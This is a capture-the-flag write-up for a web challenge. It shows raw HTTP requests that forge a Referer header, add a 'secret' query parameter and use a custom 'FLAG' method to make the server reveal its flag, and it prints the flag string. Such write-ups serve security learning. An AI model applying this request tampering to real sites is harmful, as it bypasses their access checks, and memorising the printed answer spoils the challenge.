Rating:

Navigating to the website gives a page with the message:

`You are not coming from "http://flagland.internal/".`

This looks like it'a reference to the `Referer` header. More info on this header here: <https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Referer>

Using Burp Suite we can tamper with the request and include the header `Referer: http://flagland.internal/` in the request

```http
GET / HTTP/1.1
Host: 18.184.219.56:8080
Referer: http://flagland.internal/

```

That request gives us a new page with the message in the content:

`<div class="msg" style="">Unspecified "secret".</div>`

This could be a clue to use a query parameter in the url. Let's modify the request to include it and set the query parmeter

```http
GET /?secret HTTP/1.1
Host: 18.184.219.56:8080
Referer: http://flagland.internal/

```

Bingo! This gives us another clue

```html
<div class="msg" style="">
Incorrect secret.
</div>
```

The protocol being used is `http` so let's set the value of the `secret` query parameter to `secret=http`

```html
<div class="msg" style="">
Sorry we don't have "GET" here but we might have other things like "FLAG".
</div>
```

Another clue. Let's change the GET in the request to FLAG

```http
FLAG /?secret=http HTTP/1.1
Host: 18.184.219.56:8080
Referer: http://flagland.internal/

```

And this last request gets us the flag!

`MAPNA{533m5-l1k3-y0u-kn0w-h77p-1836a2f}`